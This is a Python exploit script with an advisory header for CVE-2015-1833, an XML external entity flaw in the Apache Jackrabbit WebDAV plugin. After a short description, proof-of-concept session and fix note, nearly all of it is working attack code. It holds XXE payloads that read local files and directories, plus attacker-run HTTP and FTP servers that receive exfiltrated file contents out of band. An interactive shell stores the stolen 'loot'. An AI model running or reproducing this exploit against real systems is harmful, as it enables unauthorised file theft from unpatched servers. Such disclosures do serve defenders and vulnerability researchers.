1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382 | #!/usr/bin/env python
"""
# Exploit Title: Jackrabbit WebDAV XXE
# Date: 25-05-2015
# Software Link: http://jackrabbit.apache.org/jcr/
# Exploit Author: Mikhail Egorov
# Contact: 0ang3el () gmail com
# Website: http://0ang3el.blogspot.com
# CVE: CVE-2015-1833
# Category: webapps
1. Description
Jackrabbit WebDAV plugin use insecurely configured XML parser to parse
incoming PROPPATCH and PROPFIND requests. As a result it is vulnerable to
XXE attacks.
Besides Jackrabbit JCR, WebDAV plugin is incorporated into the following
software: Apache Sling, Adobe AEM.
2. Proof of Concept
Download vulnerable Apache Sling launchpad web application from here -
https://sling.apache.org
Start launchpad web application as follows:
root@kali:~/build-sling# java -jar
org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar
Launch exploit with the following command:
root@kali:~# python cve-2015-1833.py --url http://127.0.0.1:8080/content/xxe
--tech oob --ip 127.0.0.1
enter command> get .
loaded 210 bytes in buffer
enter command> show
apache-maven-3.0.5
apache-maven-3.0.5-bin.tar.gz
derby.log
eclipse
hs_err_pid5379.log
org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar
python-workspace
enter command> store /tmp/cwd.lst
buffer content has been stored in file /tmp/cwd.lst
enter command> exit
root@kali:~#
Exploit have three exploitation techniques:
* inb1 - inbound XXE technique, it first writes content as attribute value
of controllable JCR node using PROPPATCH request and then retrieves content
using PROPFIND request
* inb2 - same as inb1, but there is some XML magic to retrieve content that
is not valid XML data
* oob - out-of-bound technique, utilizes FTP hack from this blog
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
Technique inb2 is the most stable. But it requires credentials of the user
that is able to modify some JCR node. Attacker host must have "visible ip"
which is required for communication between target and attacker's host.
Technique oob works even with anonymous credentials. But it is not so
stable as inb2 technique.
Technique inb1 does not require "visible ip", but there are limitations on
retrieved content.
3. Solution:
If you use Apache Jackrabbit, install version 2.10.1.
http://www.apache.org/dist/jackrabbit/2.10.1/RELEASE-NOTES.txt
"""
from urllib2 import *
import sys, string, random
import base64
import xml.etree.ElementTree as ET
import BaseHTTPServer, SimpleHTTPServer
from multiprocessing import Process, Value, Manager
from optparse import OptionParser
import socket, select
usage= """
%prog --url <url> --tech inb1 [ --creds <creds> ]
%prog --url <url> --tech inb2 --ip <ip> [ --creds <creds> --hport <hport> ]
%prog --url <url> --tech oob --ip <ip> [ --creds <creds> --hport <hport> --fport <fport>]
"""
help_interpreter = """
help - print this help.
get <dir or file> - retrieve directory listing or file content and store it inside internal buffer. You can use "." to denote current directory (e.g. use "get ." for cwd listing).
show - show content of internal buffer.
store <out file> - store internal buffer in file.
exit - stop exploiting
"""
failure_descr = """
Possible reasons:
1. Inappropriate technique, try another options.
2. You do not have permissions to read file or list directory.
3. Target is not exploitable.
"""
rand_attr = ''
script_name = sys.argv[0].split('/')[-1]
buffer_with_loot = ''
url, tech, ip, creds, hport, fport = [None] * 6
http_server, ftp_server = [None] * 2
class HTTP_XXE():
def __init__(self, ip, port, fport):
self.port = port
self.ip = ip
self.fport = fport
def run(self):
class http_handler(BaseHTTPServer.BaseHTTPRequestHandler):
def __init__(self, ip, fport,*args):
self.ip = ip
self.fport = fport
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args)
def do_GET(self):
if "inb2" in self.path:
self.send_response(200)
self.send_header('Content-type','application/xml')
self.end_headers()
self.wfile.write('<?xml version="1.0" encoding="utf-8"?><!ENTITY all "%start;%loot;%end;">')
if "oob" in self.path:
self.send_response(200)
self.send_header('Content-type','application/xml')
self.end_headers()
self.wfile.write('<?xml version="1.0" encoding="utf-8"?><!ENTITY %% all "<!ENTITY % send SYSTEM "ftp://%(ip)s:%(port)s/%%loot;">">%%all;' % {'ip' : self.ip, 'port' : self.fport})
def log_message(self, format, *args): # silent HTTP server
return
def serve(httpd):
while True:
httpd.handle_request()
handler = lambda *args: http_handler(self.ip, self.fport, *args)
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', self.port), handler)
self.proc = Process(target = serve, args = (httpd,))
self.proc.start()
def stop(self):
self.proc.terminate()
class FTP_XXE():
def __init__(self, port):
self.port = port
def run(self):
class ftp_handler():
def __init__(self, port):
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.setblocking(0)
self.server.bind(('0.0.0.0', port))
self.server.listen(5)
def serve(self, d):
inputs = [self.server]
while True:
readable, writable, exceptional = select.select(inputs, [], [])
for s in readable:
if s is self.server:
connection, client_address = s.accept()
connection.setblocking(0)
inputs.append(connection)
connection.send("220 xxe-ftp-server\n")
else:
data = s.recv(1024)
if not data:
inputs.remove(s)
continue
if "USER" in data:
s.send("331 password please - version check\n")
else:
s.send("230 more data please!\n")
if not len([x for x in ["PASS","EPSV","EPRT","TYPE"] if x in data]):
d['loot'] += data
self.d = Manager().dict()
self.d['loot'] = ''
ftpd = ftp_handler(self.port)
self.proc = Process(target = ftpd.serve, args=(self.d,))
self.proc.start()
def stop(self):
self.proc.terminate()
def clean_buf(self):
self.d['loot'] = ''
def get_loot(self):
loot = self.d['loot']
# clean data
loot = loot.replace('\r\nRETR ','/')
loot = loot.replace('\r\nCWD ','/')
loot = loot.replace('CWD ','',1)
loot = loot.replace('RETR ','',1)
return loot
def exploit(url, technique, creds = 'anonymous:anonymous'):
global buffer_with_loot, rand_attr
requests = {
'inb1' : {
'PROPPATCH' : '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE propertyupdate [ <!ENTITY loot SYSTEM "%(file)s"> ]> <D:propertyupdate xmlns:D="DAV:"> <D:set> <D:prop> <%(attr_name)s>&loot;</%(attr_name)s> </D:prop> </D:set> </D:propertyupdate>',
'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>'
},
'inb2' : {
'PROPPATCH' : '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE propertyupdate [ <!ENTITY %% start "<![CDATA["> <!ENTITY %% loot SYSTEM "%(file)s"> <!ENTITY %% end "]]>"> <!ENTITY %% dtd SYSTEM "http://%(ip)s:%(port)s/inb2"> %%dtd; ]> <D:propertyupdate xmlns:D="DAV:"> <D:set> <D:prop> <%(attr_name)s>&all;</%(attr_name)s> </D:prop> </D:set> </D:propertyupdate>',
'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>'
},
'oob' : {
'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE propfind [ <!ENTITY %% loot SYSTEM "%(file)s"> <!ENTITY %% dtd SYSTEM "http://%(ip)s:%(port)s/oob"> %%dtd; %%send; ]> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>'
}
}
def request(url, verb, data, creds, timeout):
req = Request(url, data)
req.add_header('User-Agent', script_name)
req.add_header('Content-Type', 'application/xml')
req.add_header('Authorization', 'Basic ' + base64.b64encode(creds))
req.get_method = lambda: verb
#req.set_proxy('127.0.0.1:8081','http') ### For debug
resp = None
try:
resp = urlopen(req, timeout = timeout).read()
except Exception, e:
pass
return resp
while 1:
cmdline = raw_input('\033[33menter command> \033[0m')
cmdline = re.sub('\s+', ' ', cmdline)
cmd = cmdline.split(' ')[0]
arg = cmdline.split(' ')[-1]
if cmd not in ['help', 'get', 'show', 'store', 'exit']:
print '\n\033[36mno such command, use help for command list \033[0m\n'
continue
if cmd == 'exit':
break
if cmd == 'help':
print '\033[36m' + help_interpreter + '\033[0m'
continue
if cmd == 'show':
print '\n\033[36m' + buffer_with_loot + '\033[0m'
continue
if cmd == 'store':
with open(arg,'w') as outf:
outf.write(buffer_with_loot)
print '\n\033[32mbuffer content has been stored in file ' + arg + '\033[0m\n'
continue
if cmd == 'get':
if arg.startswith('.'):
arg = '/proc/self/cwd' + arg[1:]
arg = 'file://' + arg
rand_attr = ''.join([random.choice(string.ascii_lowercase) for i in range(10)]) ### random attribute name where we place content
if technique == 'inb1':
request1 = requests['inb1']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg}
request(url, 'PROPPATCH', request1, creds, timeout = 30)
request2 = requests['inb1']['PROPFIND']
loot = request(url, 'PROPFIND', request2, creds, timeout = 30)
try:
buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text
except:
buffer_with_loot = ''
if technique == 'inb2':
request1 = requests['inb2']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg, 'ip' : ip, 'port' : hport}
request(url, 'PROPPATCH', request1, creds, timeout = 30)
request2 = requests['inb2']['PROPFIND']
loot = request(url, 'PROPFIND', request2, creds, timeout = 30)
try:
buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text.replace('<[CDATA[','').replace(']]>','')
except:
buffer_with_loot = ''
if technique == 'oob':
request1 = requests['oob']['PROPFIND'] % {'file' : arg, 'ip' : ip, 'port' : hport}
request(url, 'PROPFIND', request1, creds, timeout = 8)
buffer_with_loot = ftp_server.get_loot()
ftp_server.clean_buf()
len_ = sys.getsizeof(buffer_with_loot) - sys.getsizeof('')
print "\n\033[32mloaded %s bytes in buffer\033[0m\n" % len_
if not len_:
print '\033[36m' + failure_descr + '\033[0m'
continue
def parse_options():
global url, tech, ip, creds, hport, fport
parser = OptionParser(usage = usage)
parser.add_option('--url', dest = url, help = 'url parameter')
parser.add_option('--tech', dest = tech, help = 'technique, valid values are: inb1, inb2, oob')
parser.add_option('--creds', dest = creds, help = 'user credentials, default value is anonymous:anonymous')
parser.add_option('--ip', dest = ip, help = 'ip address of netw interface that your target is able to access')
parser.add_option('--hport', dest = hport, help = 'port for HTTP server which will be launched during attack, default is 9998')
parser.add_option('--fport', dest = fport, help = 'port for FTP server which will be launched during attack, default is 9999')
(options, args) = parser.parse_args()
if not options.url or not options.tech:
print 'you must specify url and tech parameters'
sys.exit(2)
if options.tech not in ['inb1', 'inb2', 'oob']:
print 'invalid tech parameter'
sys.exit(2)
if options.tech != 'inb1' and not options.ip:
print 'you must specify ip parameter'
sys.exit(2)
url = options.url
tech = options.tech
ip = options.ip
creds = options.creds if options.creds else 'anonymous:anonymous'
hport = options.hport if options.hport else 9998
fport = options.fport if options.fport else 9999
parse_options()
if tech != 'inb1':
http_server = HTTP_XXE(ip, hport, fport)
http_server.run()
if tech == 'oob':
ftp_server = FTP_XXE(fport)
ftp_server.run()
exploit(url, tech, creds)
if tech != 'inb1':
http_server.stop()
if tech == 'oob':
ftp_server.stop()
|
